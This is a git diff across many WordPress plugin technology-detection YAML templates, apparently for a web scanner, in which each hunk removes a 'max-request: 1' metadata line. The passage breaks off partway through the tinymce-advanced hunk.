a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index dfcaf6f71b..3f141c4476 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: - max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 61be246fee..5355e988a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: - max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 1c16a72d76..6f06b49011 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: - max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 50d2e6630b..53d409fb68 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 8d71f7bde9..0e908a9580 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 5e1f97086e..aeb1875c57 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: - max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index d87d456a8c..7c15702305 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: - max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index aa9153241e..5ce87e6c71 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: - max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 09641796a3..c342e6b45a 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: - max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 28b70d09bf..e95041f555 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: - max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index b43c10ed7a..879a0d1c12 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: - max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index eb7e78bc7f..985f5d373a 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: - max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 3da2ea50e1..bbc305b8de 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: - max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7a58c58f63..7e3e4e2d7e 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: - max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 5f99b8cac8..17ea142c46 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: - max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index b08876df04..953e4ab3d8 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: - max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 3f68dffe06..92107fa69c 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: - max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 34f9bde1d6..5e1fe4ef5c 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: - max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d9f645328f..74fb3e6010 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: - max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 8a1196fc9f..b9f70ba555 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: - max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 05025452b7..6486c02c9a 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: - max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 1db1b57708..81f58198d3 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: - max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index dafe6974f6..3743307dbc 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: - max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index ba05fb1e16..a4c6980041 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: - max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index a038adac53..e085f30e5a 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pinterest-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: pinterest-for-woocommerce wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 7f98d822a8..adf3387ddb 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: - max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 89602f4264..eb6e1aaa5d 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: - max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index 2f6513ca42..b3c83cd0bf 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: - max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 982306b13c..96d8bd6aca 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: - max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index fdcac13b56..85955ac95e 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: - max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index fc316f9f7a..a81fc892ca 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: - max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 975b63f5de..d9c6052cd7 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: - max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 5065659e82..afc1141e0c 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: - max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 732ffbc4eb..d44add9ca6 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: - max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 12dffeb534..20ba5c2e16 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: - max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index ae0e76c4bb..cbcf3cf09d 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: - max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index b1718d1ccb..3311d42c94 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: - max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 7543ac1d55..46c1c22805 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4a29cecdb0..7c13b8d2a4 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: - max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index be281d91e6..53b30ba721 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: - max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 6bd95ec077..9555d7aebd 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: - max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 1fd64a5279..180266f448 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: - max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 1bb9a283ce..17584cd064 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: - max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7836d9554c..015fb97043 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: - max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index ccd72e427a..1d5224b457 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: - max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3622b2c6b3..aafd6c6a38 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: - max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 9eff765d61..e10ab985da 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: - max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index c856e1fa9e..9881b591ae 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: - max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 008440cc58..0480b4b0e6 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: - max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 410776862f..26d525386b 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: - max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index f210a2a2f9..3920c5cf56 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: - max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f1dd1bf150..f556786f5a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: - max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index a9ec913599..844e3d19a0 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: - max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index d38aeb0279..eb0f02f602 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: - max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 07c43b9d80..755efd53fa 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: - max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 83a849e11e..0403bb4e72 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: - max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index c6100637d9..cd2632ea05 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: - max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 1f188b66c6..b5f8b822c7 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: - max-request: 1 plugin_namespace: 